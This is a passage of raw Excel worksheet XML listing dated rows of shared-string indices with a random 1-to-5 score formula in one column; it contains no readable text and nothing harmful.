      <c r="C28543" t="s">
        <v>10</v>
      </c>
      <c r="D28543" t="s">
        <v>6</v>
      </c>
      <c r="E28543" t="s">
        <v>26007</v>
      </c>
      <c r="F28543">
        <f t="shared" ca="1" si="445"/>
        <v>2</v>
      </c>
    </row>
    <row r="28544" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A28544" s="1">
        <v>42845.597199074073</v>
      </c>
      <c r="C28544" t="s">
        <v>10</v>
      </c>
      <c r="D28544" t="s">
        <v>6</v>
      </c>
      <c r="E28544" s="2" t="s">
        <v>26008</v>
      </c>
      <c r="F28544">
        <f t="shared" ca="1" si="445"/>
        <v>5</v>
      </c>
    </row>
    <row r="28545" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A28545" s="1">
        <v>42845.586944444447</v>
      </c>
      <c r="C28545" t="s">
        <v>65</v>
      </c>
      <c r="E28545" s="2" t="s">
        <v>26009</v>
      </c>
      <c r="F28545">
        <f t="shared" ca="1" si="445"/>
        <v>2</v>
      </c>
    </row>
    <row r="28546" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28546" s="1">
        <v>42845.563391203701</v>
      </c>
      <c r="C28546" t="s">
        <v>41</v>
      </c>
      <c r="E28546" t="s">
        <v>26010</v>
      </c>
      <c r="F28546">
        <f t="shared" ref="F28546:F28609" ca="1" si="446">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="28547" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A28547" s="1">
        <v>42845.530127314814</v>
      </c>
      <c r="C28547" t="s">
        <v>48</v>
      </c>
      <c r="E28547" s="2" t="s">
        <v>26011</v>
      </c>
      <c r="F28547">
        <f t="shared" ca="1" si="446"/>
        <v>3</v>
      </c>
    </row>
    <row r="28548" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28548" s="1">
        <v>42845.529745370368</v>
      </c>
      <c r="C28548" t="s">
        <v>10</v>
      </c>
      <c r="D28548" t="s">
        <v>23</v>
      </c>
      <c r="E28548" t="s">
        <v>26012</v>
      </c>
      <c r="F28548">
        <f t="shared" ca="1" si="446"/>
        <v>3</v>
      </c>
    </row>
    <row r="28549" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28549" s="1">
        <v>42845.515810185185</v>
      </c>
      <c r="C28549" t="s">
        <v>173</v>
      </c>
      <c r="E28549" t="s">
        <v>26013</v>
      </c>
      <c r="F28549">
        <f t="shared" ca="1" si="446"/>
        <v>2</v>
      </c>
    </row>
    <row r="28550" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A28550" s="1">
        <v>42845.498124999998</v>
      </c>
      <c r="C28550" t="s">
        <v>260</v>
      </c>
      <c r="E28550" s="2" t="s">
        <v>26014</v>
      </c>
      <c r="F28550">
        <f t="shared" ca="1" si="446"/>
        <v>3</v>
      </c>
    </row>
    <row r="28551" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A28551" s="1">
        <v>42845.497754629629</v>
      </c>
      <c r="C28551" t="s">
        <v>10</v>
      </c>
      <c r="D28551" t="s">
        <v>713</v>
      </c>
      <c r="E28551" s="2" t="s">
        <v>26015</v>
      </c>
      <c r="F28551">
        <f t="shared" ca="1" si="446"/>
        <v>1</v>
      </c>
    </row>
    <row r="28552" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28552" s="1">
        <v>42845.494664351849</v>
      </c>
      <c r="C28552" t="s">
        <v>10</v>
      </c>
      <c r="D28552" t="s">
        <v>251</v>
      </c>
      <c r="E28552" t="s">
        <v>26016</v>
      </c>
      <c r="F28552">
        <f t="shared" ca="1" si="446"/>
        <v>1</v>
      </c>
    </row>
    <row r="28553" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28553" s="1">
        <v>42845.491388888891</v>
      </c>
      <c r="C28553" t="s">
        <v>10</v>
      </c>
      <c r="D28553" t="s">
        <v>192</v>
      </c>
      <c r="E28553" t="s">
        <v>26017</v>
      </c>
      <c r="F28553">
        <f t="shared" ca="1" si="446"/>
        <v>4</v>
      </c>
    </row>
    <row r="28554" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28554" s="1">
        <v>42845.491365740738</v>
      </c>
      <c r="C28554" t="s">
        <v>10</v>
      </c>
      <c r="D28554" t="s">
        <v>192</v>
      </c>
      <c r="E28554" t="s">
        <v>26017</v>
      </c>
      <c r="F28554">
        <f t="shared" ca="1" si="446"/>
        <v>4</v>
      </c>
    </row>
    <row r="28555" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A28555" s="1">
        <v>42845.484432870369</v>
      </c>
      <c r="C28555" t="s">
        <v>10</v>
      </c>
      <c r="D28555" t="s">
        <v>23</v>
      </c>
      <c r="E28555" s="2" t="s">
        <v>26018</v>
      </c>
      <c r="F28555">
        <f t="shared" ca="1" si="446"/>
        <v>3</v>
      </c>
    </row>
    <row r="28556" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28556" s="1">
        <v>42845.484293981484</v>
      </c>
      <c r="C28556" t="s">
        <v>48</v>
      </c>
      <c r="E28556" t="s">
        <v>26019</v>
      </c>
      <c r="F28556">
        <f t="shared" ca="1" si="446"/>
        <v>4</v>
      </c>
    </row>
    <row r="28557" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28557" s="1">
        <v>42845.470405092594</v>
      </c>
      <c r="C28557" t="s">
        <v>10</v>
      </c>
      <c r="D28557" t="s">
        <v>112</v>
      </c>
      <c r="E28557" t="s">
        <v>26020</v>
      </c>
      <c r="F28557">
        <f t="shared" ca="1" si="446"/>
        <v>1</v>
      </c>
    </row>
    <row r="28558" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28558" s="1">
        <v>42845.466805555552</v>
      </c>
      <c r="C28558" t="s">
        <v>318</v>
      </c>
      <c r="E28558" t="s">
        <v>26021</v>
      </c>
      <c r="F28558">
        <f t="shared" ca="1" si="446"/>
        <v>4</v>
      </c>
    </row>
    <row r="28559" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28559" s="1">
        <v>42845.458935185183</v>
      </c>
      <c r="C28559" t="s">
        <v>97</v>
      </c>
      <c r="E28559" t="s">
        <v>26022</v>
      </c>
      <c r="F28559">
        <f t="shared" ca="1" si="446"/>
        <v>2</v>
      </c>
    </row>
    <row r="28560" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28560" s="1">
        <v>42845.45008101852</v>
      </c>
      <c r="C28560" t="s">
        <v>10</v>
      </c>
      <c r="D28560" t="s">
        <v>11</v>
      </c>
      <c r="E28560" t="s">
        <v>26023</v>
      </c>
      <c r="F28560">
        <f t="shared" ca="1" si="446"/>
        <v>5</v>
      </c>
    </row>
    <row r="28561" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28561" s="1">
        <v>42845.44258101852</v>
      </c>
      <c r="C28561" t="s">
        <v>10</v>
      </c>
      <c r="E28561" t="s">
        <v>26024</v>
      </c>
      <c r="F28561">
        <f t="shared" ca="1" si="446"/>
        <v>1</v>
      </c>
    </row>
    <row r="28562" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A28562" s="1">
        <v>42845.426770833335</v>
      </c>
      <c r="C28562" t="s">
        <v>16</v>
      </c>
      <c r="E28562" s="2" t="s">
        <v>26025</v>
      </c>
      <c r="F28562">
        <f t="shared" ca="1" si="446"/>
        <v>1</v>
      </c>
    </row>
    <row r="28563" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A28563" s="1">
        <v>42845.425925925927</v>
      </c>
      <c r="C28563" t="s">
        <v>6</v>
      </c>
      <c r="D28563" t="s">
        <v>194</v>
      </c>
      <c r="E28563" s="2" t="s">
        <v>26026</v>
      </c>
      <c r="F28563">
        <f t="shared" ca="1" si="446"/>
        <v>2</v>
      </c>
    </row>
    <row r="28564" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28564" s="1">
        <v>42845.397824074076</v>
      </c>
      <c r="C28564" t="s">
        <v>6</v>
      </c>
      <c r="D28564" t="s">
        <v>25</v>
      </c>
      <c r="E28564" t="s">
        <v>26027</v>
      </c>
      <c r="F28564">
        <f t="shared" ca="1" si="446"/>
        <v>3</v>
      </c>
    </row>
    <row r="28565" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28565" s="1">
        <v>42845.391458333332</v>
      </c>
      <c r="C28565" t="s">
        <v>253</v>
      </c>
      <c r="E28565" t="s">
        <v>17118</v>
      </c>
      <c r="F28565">
        <f t="shared" ca="1" si="446"/>
        <v>2</v>
      </c>
    </row>
    <row r="28566" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A28566" s="1">
        <v>42845.384884259256</v>
      </c>
      <c r="C28566" t="s">
        <v>71</v>
      </c>
      <c r="E28566" s="2" t="s">
        <v>26028</v>
      </c>
      <c r="F28566">
        <f t="shared" ca="1" si="446"/>
        <v>2</v>
      </c>
    </row>
    <row r="28567" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A28567" s="1">
        <v>42845.384016203701</v>
      </c>
      <c r="C28567" t="s">
        <v>10</v>
      </c>
      <c r="D28567" t="s">
        <v>222</v>
      </c>
      <c r="E28567" s="2" t="s">
        <v>26029</v>
      </c>
      <c r="F28567">
        <f t="shared" ca="1" si="446"/>
        <v>2</v>
      </c>
    </row>
    <row r="28568" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A28568" s="1">
        <v>42845.382314814815</v>
      </c>
      <c r="C28568" t="s">
        <v>10</v>
      </c>
      <c r="D28568" t="s">
        <v>112</v>
      </c>
      <c r="E28568" s="2" t="s">
        <v>26030</v>
      </c>
      <c r="F28568">
        <f t="shared" ca="1" si="446"/>
        <v>2</v>
      </c>
    </row>
    <row r="28569" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28569" s="1">
        <v>42845.350925925923</v>
      </c>
      <c r="C28569" t="s">
        <v>60</v>
      </c>
      <c r="F28569">
        <f t="shared" ca="1" si="446"/>
        <v>4</v>
      </c>
    </row>
    <row r="28570" spans="1:6" ht="390" x14ac:dyDescent="0.25">
      <c r="A28570" s="1">
        <v>42845.338877314818</v>
      </c>
      <c r="C28570" t="s">
        <v>197</v>
      </c>
      <c r="E28570" s="2" t="s">
        <v>26031</v>
      </c>
      <c r="F28570">
        <f t="shared" ca="1" si="446"/>
        <v>2</v>
      </c>
    </row>
    <row r="28571" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A28571" s="1">
        <v>42845.334641203706</v>
      </c>
      <c r="C28571" t="s">
        <v>48</v>
      </c>
      <c r="E28571" s="2" t="s">
        <v>26032</v>
      </c>
      <c r="F28571">
        <f t="shared" ca="1" si="446"/>
        <v>1</v>
      </c>
    </row>
    <row r="28572" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A28572" s="1">
        <v>42845.310520833336</v>
      </c>
      <c r="C28572" t="s">
        <v>71</v>
      </c>
      <c r="E28572" s="2" t="s">
        <v>26033</v>
      </c>
      <c r="F28572">
        <f t="shared" ca="1" si="446"/>
        <v>2</v>
      </c>
    </row>
    <row r="28573" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A28573" s="1">
        <v>42845.286840277775</v>
      </c>
      <c r="C28573" t="s">
        <v>5087</v>
      </c>
      <c r="E28573" s="2" t="s">
        <v>26034</v>
      </c>
      <c r="F28573">
        <f t="shared" ca="1" si="446"/>
        <v>3</v>
      </c>
    </row>
    <row r="28574" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A28574" s="1">
        <v>42845.254386574074</v>
      </c>
      <c r="C28574" t="s">
        <v>69</v>
      </c>
      <c r="E28574" s="2" t="s">
        <v>26035</v>
      </c>
      <c r="F28574">
        <f t="shared" ca="1" si="446"/>
        <v>4</v>
      </c>
    </row>
    <row r="28575" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28575" s="1">
        <v>42845.249097222222</v>
      </c>
      <c r="C28575" t="s">
        <v>318</v>
      </c>
      <c r="E28575" t="s">
        <v>7503</v>
      </c>
      <c r="F28575">
        <f t="shared" ca="1" si="446"/>
        <v>5</v>
      </c>
    </row>
    <row r="28576" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28576" s="1">
        <v>42845.200416666667</v>
      </c>
      <c r="C28576" t="s">
        <v>48</v>
      </c>
      <c r="E28576" t="s">
        <v>26036</v>
      </c>
      <c r="F28576">
        <f t="shared" ca="1" si="446"/>
        <v>1</v>
      </c>
    </row>
    <row r="28577" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28577" s="1">
        <v>42845.187407407408</v>
      </c>
      <c r="C28577" t="s">
        <v>542</v>
      </c>
      <c r="F28577">
        <f t="shared" ca="1" si="446"/>
        <v>1</v>
      </c>
    </row>
    <row r="28578" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28578" s="1">
        <v>42845.161898148152</v>
      </c>
      <c r="C28578" t="s">
        <v>48</v>
      </c>
      <c r="E28578" t="s">
        <v>26037</v>
      </c>
      <c r="F28578">
        <f t="shared" ca="1" si="446"/>
        <v>2</v>
      </c>
    </row>
    <row r="28579" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28579" s="1">
        <v>42845.114374999997</v>
      </c>
      <c r="C28579" t="s">
        <v>10</v>
      </c>
      <c r="D28579" t="s">
        <v>36</v>
      </c>
      <c r="E28579" t="s">
        <v>26038</v>
      </c>
      <c r="F28579">
        <f t="shared" ca="1" si="446"/>
        <v>4</v>
      </c>
    </row>
    <row r="28580" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28580" s="1">
        <v>42845.103402777779</v>
      </c>
      <c r="C28580" t="s">
        <v>7058</v>
      </c>
      <c r="E28580" t="s">
        <v>26039</v>
      </c>
      <c r="F28580">
        <f t="shared" ca="1" si="446"/>
        <v>5</v>
      </c>
    </row>
    <row r="28581" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28581" s="1">
        <v>42845.09003472222</v>
      </c>
      <c r="C28581" t="s">
        <v>41</v>
      </c>
      <c r="E28581" t="s">
        <v>26040</v>
      </c>
      <c r="F28581">
        <f t="shared" ca="1" si="446"/>
        <v>3</v>
      </c>
    </row>
    <row r="28582" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28582" s="1">
        <v>42845.088437500002</v>
      </c>
      <c r="C28582" t="s">
        <v>471</v>
      </c>
      <c r="E28582" t="s">
        <v>26041</v>
      </c>
      <c r="F28582">
        <f t="shared" ca="1" si="446"/>
        <v>1</v>
      </c>
    </row>
    <row r="28583" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28583" s="1">
        <v>42845.07403935185</v>
      </c>
      <c r="C28583" t="s">
        <v>253</v>
      </c>
      <c r="E28583" t="s">
        <v>26042</v>
      </c>
      <c r="F28583">
        <f t="shared" ca="1" si="446"/>
        <v>5</v>
      </c>
    </row>
    <row r="28584" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28584" s="1">
        <v>42845.041203703702</v>
      </c>
      <c r="C28584" t="s">
        <v>471</v>
      </c>
      <c r="E28584" t="s">
        <v>26043</v>
      </c>
      <c r="F28584">
        <f t="shared" ca="1" si="446"/>
        <v>2</v>
      </c>
    </row>
    <row r="28585" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A28585" s="1">
        <v>42845.010763888888</v>
      </c>
      <c r="C28585" t="s">
        <v>10</v>
      </c>
      <c r="D28585" t="s">
        <v>1160</v>
      </c>
      <c r="E28585" s="2" t="s">
        <v>26044</v>
      </c>
      <c r="F28585">
        <f t="shared" ca="1" si="446"/>
        <v>5</v>
      </c>
    </row>
    <row r="28586" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28586" s="1">
        <v>42844.978958333333</v>
      </c>
      <c r="C28586" t="s">
        <v>41</v>
      </c>
      <c r="E28586" t="s">
        <v>26045</v>
      </c>
      <c r="F28586">
        <f t="shared" ca="1" si="446"/>
        <v>3</v>
      </c>
    </row>
    <row r="28587" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28587" s="1">
        <v>42844.896620370368</v>
      </c>
      <c r="C28587" t="s">
        <v>10</v>
      </c>
      <c r="D28587" t="s">
        <v>80</v>
      </c>
      <c r="F28587">
        <f t="shared" ca="1" si="446"/>
        <v>4</v>
      </c>
    </row>
    <row r="28588" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28588" s="1">
        <v>42844.795439814814</v>
      </c>
      <c r="C28588" t="s">
        <v>144</v>
      </c>
      <c r="E28588" t="s">
        <v>26046</v>
      </c>
      <c r="F28588">
        <f t="shared" ca="1" si="446"/>
        <v>1</v>
      </c>
    </row>
    <row r="28589" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28589" s="1">
        <v>42844.773321759261</v>
      </c>
      <c r="C28589" t="s">
        <v>10</v>
      </c>
      <c r="D28589" t="s">
        <v>6</v>
      </c>
      <c r="E28589" t="s">
        <v>26047</v>
      </c>
      <c r="F28589">
        <f t="shared" ca="1" si="446"/>
        <v>2</v>
      </c>
    </row>
    <row r="28590" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28590" s="1">
        <v>42844.746944444443</v>
      </c>
      <c r="C28590" t="s">
        <v>10</v>
      </c>
      <c r="D28590" t="s">
        <v>17</v>
      </c>
      <c r="E28590" t="s">
        <v>26048</v>
      </c>
      <c r="F28590">
        <f t="shared" ca="1" si="446"/>
        <v>5</v>
      </c>
    </row>
    <row r="28591" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28591" s="1">
        <v>42844.741736111115</v>
      </c>
      <c r="C28591" t="s">
        <v>6</v>
      </c>
      <c r="D28591" t="s">
        <v>114</v>
      </c>
      <c r="E28591" t="s">
        <v>26049</v>
      </c>
      <c r="F28591">
        <f t="shared" ca="1" si="446"/>
        <v>5</v>
      </c>
    </row>
    <row r="28592" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28592" s="1">
        <v>42844.74082175926</v>
      </c>
      <c r="C28592" t="s">
        <v>10</v>
      </c>
      <c r="D28592" t="s">
        <v>6</v>
      </c>
      <c r="E28592" t="s">
        <v>26050</v>
      </c>
      <c r="F28592">
        <f t="shared" ca="1" si="446"/>
        <v>5</v>
      </c>
    </row>
    <row r="28593" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28593" s="1">
        <v>42844.73133101852</v>
      </c>
      <c r="C28593" t="s">
        <v>10</v>
      </c>
      <c r="D28593" t="s">
        <v>33</v>
      </c>
      <c r="E28593" t="s">
        <v>26051</v>
      </c>
      <c r="F28593">
        <f t="shared" ca="1" si="446"/>
        <v>2</v>
      </c>
    </row>
    <row r="28594" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28594" s="1">
        <v>42844.7187962963</v>
      </c>
      <c r="C28594" t="s">
        <v>10</v>
      </c>
      <c r="D28594" t="s">
        <v>71</v>
      </c>
      <c r="E28594" t="s">
        <v>26052</v>
      </c>
      <c r="F28594">
        <f t="shared" ca="1" si="446"/>
        <v>2</v>
      </c>
    </row>
    <row r="28595" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A28595" s="1">
        <v>42844.704641203702</v>
      </c>
      <c r="C28595" t="s">
        <v>10</v>
      </c>
      <c r="D28595" t="s">
        <v>374</v>
      </c>
      <c r="E28595" s="2" t="s">
        <v>26053</v>
      </c>
      <c r="F28595">
        <f t="shared" ca="1" si="446"/>
        <v>5</v>
      </c>
    </row>
    <row r="28596" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28596" s="1">
        <v>42844.69672453704</v>
      </c>
      <c r="C28596" t="s">
        <v>10</v>
      </c>
      <c r="D28596" t="s">
        <v>178</v>
      </c>
      <c r="E28596" t="s">
        <v>26054</v>
      </c>
      <c r="F28596">
        <f t="shared" ca="1" si="446"/>
        <v>5</v>
      </c>
    </row>
    <row r="28597" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28597" s="1">
        <v>42844.694062499999</v>
      </c>
      <c r="C28597" t="s">
        <v>10</v>
      </c>
      <c r="D28597" t="s">
        <v>20</v>
      </c>
      <c r="E28597" t="s">
        <v>26055</v>
      </c>
      <c r="F28597">
        <f t="shared" ca="1" si="446"/>
        <v>5</v>
      </c>
    </row>
    <row r="28598" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28598" s="1">
        <v>42844.626747685186</v>
      </c>
      <c r="C28598" t="s">
        <v>10</v>
      </c>
      <c r="D28598" t="s">
        <v>667</v>
      </c>
      <c r="E28598" t="s">
        <v>26056</v>
      </c>
      <c r="F28598">
        <f t="shared" ca="1" si="446"/>
        <v>5</v>
      </c>
    </row>
    <row r="28599" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28599" s="1">
        <v>42844.611192129632</v>
      </c>
      <c r="C28599" t="s">
        <v>10</v>
      </c>
      <c r="D28599" t="s">
        <v>1036</v>
      </c>
      <c r="E28599" t="s">
        <v>26057</v>
      </c>
      <c r="F28599">
        <f t="shared" ca="1" si="446"/>
        <v>1</v>
      </c>
    </row>
    <row r="28600" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28600" s="1">
        <v>42844.608969907407</v>
      </c>
      <c r="C28600" t="s">
        <v>10</v>
      </c>
      <c r="D28600" t="s">
        <v>52</v>
      </c>
      <c r="E28600" t="s">
        <v>26058</v>
      </c>
      <c r="F28600">
        <f t="shared" ca="1" si="446"/>
        <v>4</v>
      </c>
    </row>
    <row r="28601" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28601" s="1">
        <v>42844.604745370372</v>
      </c>
      <c r="C28601" t="s">
        <v>10</v>
      </c>
      <c r="D28601" t="s">
        <v>6</v>
      </c>
      <c r="E28601" t="s">
        <v>26059</v>
      </c>
      <c r="F28601">
        <f t="shared" ca="1" si="446"/>
        <v>2</v>
      </c>
    </row>
    <row r="28602" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A28602" s="1">
        <v>42844.603993055556</v>
      </c>
      <c r="C28602" t="s">
        <v>461</v>
      </c>
      <c r="E28602" s="2" t="s">
        <v>26060</v>
      </c>
      <c r="F28602">
        <f t="shared" ca="1" si="446"/>
        <v>5</v>
      </c>
    </row>
    <row r="28603" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28603" s="1">
        <v>42844.566365740742</v>
      </c>
      <c r="C28603" t="s">
        <v>10</v>
      </c>
      <c r="D28603" t="s">
        <v>192</v>
      </c>
      <c r="E28603" t="s">
        <v>26061</v>
      </c>
      <c r="F28603">
        <f t="shared" ca="1" si="446"/>
        <v>3</v>
      </c>
    </row>
    <row r="28604" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28604" s="1">
        <v>42844.563877314817</v>
      </c>
      <c r="C28604" t="s">
        <v>10</v>
      </c>
      <c r="D28604" t="s">
        <v>6</v>
      </c>
      <c r="E28604" t="s">
        <v>26062</v>
      </c>
      <c r="F28604">
        <f t="shared" ca="1" si="446"/>
        <v>5</v>
      </c>
    </row>
    <row r="28605" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28605" s="1">
        <v>42844.554247685184</v>
      </c>
      <c r="C28605" t="s">
        <v>48</v>
      </c>
      <c r="E28605" t="s">
        <v>26063</v>
      </c>
      <c r="F28605">
        <f t="shared" ca="1" si="446"/>
        <v>5</v>
      </c>
    </row>
    <row r="28606" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A28606" s="1">
        <v>42844.54583333333</v>
      </c>
      <c r="C28606" t="s">
        <v>10</v>
      </c>
      <c r="D28606" t="s">
        <v>6</v>
      </c>
      <c r="E28606" s="2" t="s">
        <v>26064</v>
      </c>
      <c r="F28606">
        <f t="shared" ca="1" si="446"/>
        <v>3</v>
      </c>
    </row>
    <row r="28607" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28607" s="1">
        <v>42844.498090277775</v>
      </c>
      <c r="C28607" t="s">
        <v>10</v>
      </c>
      <c r="D28607" t="s">
        <v>39</v>
      </c>
      <c r="E28607" t="s">
        <v>26065</v>
      </c>
      <c r="F28607">
        <f t="shared" ca="1" si="446"/>
        <v>3</v>
      </c>
    </row>
    <row r="28608" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A28608" s="1">
        <v>42844.497800925928</v>
      </c>
      <c r="C28608" t="s">
        <v>10</v>
      </c>
      <c r="D28608" t="s">
        <v>158</v>
      </c>
      <c r="E28608" s="2" t="s">
        <v>26066</v>
      </c>
      <c r="F28608">
        <f t="shared" ca="1" si="446"/>
        <v>1</v>
      </c>
    </row>
    <row r="28609" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28609" s="1">
        <v>42844.493391203701</v>
      </c>
      <c r="C28609" t="s">
        <v>10</v>
      </c>
      <c r="D28609" t="s">
        <v>817</v>
      </c>
      <c r="E28609" t="s">
        <v>26067</v>
      </c>
      <c r="F28609">
        <f t="shared" ca="1" si="446"/>
        <v>5</v>
      </c>
    </row>
    <row r="28610" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28610" s="1">
        <v>42844.489745370367</v>
      </c>
      <c r="C28610" t="s">
        <v>10</v>
      </c>
      <c r="D28610" t="s">
        <v>20</v>
      </c>
      <c r="E28610" t="s">
        <v>26068</v>
      </c>
      <c r="F28610">
        <f t="shared" ref="F28610:F28673" ca="1" si="447">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="28611" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28611" s="1">
        <v>42844.485474537039</v>
      </c>
      <c r="C28611" t="s">
        <v>10</v>
      </c>
      <c r="D28611" t="s">
        <v>251</v>
      </c>
      <c r="E28611" t="s">
        <v>26069</v>
      </c>
      <c r="F28611">
        <f t="shared" ca="1" si="447"/>
        <v>2</v>
      </c>
    </row>
    <row r="28612" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28612" s="1">
        <v>42844.483865740738</v>
      </c>
      <c r="C28612" t="s">
        <v>10</v>
      </c>
      <c r="D28612" t="s">
        <v>290</v>
      </c>
      <c r="E28612" t="s">
        <v>26070</v>
      </c>
      <c r="F28612">
        <f t="shared" ca="1" si="447"/>
        <v>2</v>
      </c>
    </row>
    <row r="28613" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28613" s="1">
        <v>42844.478148148148</v>
      </c>
      <c r="C28613" t="s">
        <v>222</v>
      </c>
      <c r="E28613" t="s">
        <v>26071</v>
      </c>
      <c r="F28613">
        <f t="shared" ca="1" si="447"/>
        <v>5</v>
      </c>
    </row>
    <row r="28614" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A28614" s="1">
        <v>42844.476203703707</v>
      </c>
      <c r="C28614" t="s">
        <v>1080</v>
      </c>
      <c r="E28614" s="2" t="s">
        <v>26072</v>
      </c>
      <c r="F28614">
        <f t="shared" ca="1" si="447"/>
        <v>4</v>
      </c>
    </row>
    <row r="28615" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28615" s="1">
        <v>42844.47042824074</v>
      </c>
      <c r="C28615" t="s">
        <v>6</v>
      </c>
      <c r="D28615" t="s">
        <v>25</v>
      </c>
      <c r="E28615" t="s">
        <v>26073</v>
      </c>
      <c r="F28615">
        <f t="shared" ca="1" si="447"/>
        <v>4</v>
      </c>
    </row>
    <row r="28616" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A28616" s="1">
        <v>42844.454780092594</v>
      </c>
      <c r="C28616" t="s">
        <v>10</v>
      </c>
      <c r="D28616" t="s">
        <v>46</v>
      </c>
      <c r="E28616" s="2" t="s">
        <v>26074</v>
      </c>
      <c r="F28616">
        <f t="shared" ca="1" si="447"/>
        <v>5</v>
      </c>
    </row>
    <row r="28617" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28617" s="1">
        <v>42844.452615740738</v>
      </c>
      <c r="C28617" t="s">
        <v>10</v>
      </c>
      <c r="D28617" t="s">
        <v>89</v>
      </c>
      <c r="E28617" t="s">
        <v>26075</v>
      </c>
      <c r="F28617">
        <f t="shared" ca="1" si="447"/>
        <v>3</v>
      </c>
    </row>
    <row r="28618" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28618" s="1">
        <v>42844.448761574073</v>
      </c>
      <c r="C28618" t="s">
        <v>10</v>
      </c>
      <c r="D28618" t="s">
        <v>80</v>
      </c>
      <c r="E28618" t="s">
        <v>26076</v>
      </c>
      <c r="F28618">
        <f t="shared" ca="1" si="447"/>
        <v>4</v>
      </c>
    </row>
    <row r="28619" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28619" s="1">
        <v>42844.439664351848</v>
      </c>
      <c r="C28619" t="s">
        <v>10</v>
      </c>
      <c r="D28619" t="s">
        <v>271</v>
      </c>
      <c r="E28619" t="s">
        <v>26077</v>
      </c>
      <c r="F28619">
        <f t="shared" ca="1" si="447"/>
        <v>5</v>
      </c>
    </row>
    <row r="28620" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A28620" s="1">
        <v>42844.437777777777</v>
      </c>
      <c r="C28620" t="s">
        <v>10</v>
      </c>
      <c r="D28620" t="s">
        <v>89</v>
      </c>
      <c r="E28620" s="2" t="s">
        <v>26078</v>
      </c>
      <c r="F28620">
        <f t="shared" ca="1" si="447"/>
        <v>1</v>
      </c>
    </row>
    <row r="28621" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28621" s="1">
        <v>42844.436249999999</v>
      </c>
      <c r="C28621" t="s">
        <v>48</v>
      </c>
      <c r="E28621" t="s">
        <v>26079</v>
      </c>
      <c r="F28621">
        <f t="shared" ca="1" si="447"/>
        <v>5</v>
      </c>
    </row>
    <row r="28622" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A28622" s="1">
        <v>42844.417951388888</v>
      </c>
      <c r="C28622" t="s">
        <v>16</v>
      </c>
